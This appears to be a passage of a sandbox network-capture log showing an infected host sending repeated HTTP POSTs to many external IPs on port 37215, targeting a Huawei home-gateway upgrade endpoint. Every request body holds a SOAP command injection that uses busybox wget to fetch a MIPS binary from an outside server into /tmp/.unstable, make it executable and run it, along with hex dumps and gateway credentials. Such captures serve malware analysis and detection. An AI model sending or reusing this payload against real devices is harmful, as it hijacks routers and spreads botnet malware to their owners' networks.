                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    239192.168.2.2334684197.65.247.21937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253499031 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    240192.168.2.2343954156.91.55.11937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253534079 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    241192.168.2.2358096156.112.166.9637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253587008 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    242192.168.2.2346024156.8.32.14937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253619909 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    243192.168.2.2355562156.207.94.9737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253660917 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    244192.168.2.2337980197.18.253.16337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253703117 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    245192.168.2.2359608156.3.243.15237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253731966 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    246192.168.2.2352106156.93.240.9437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253777027 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    247192.168.2.235011241.14.133.6337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253834963 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    248192.168.2.2342030197.154.217.1237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253854036 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 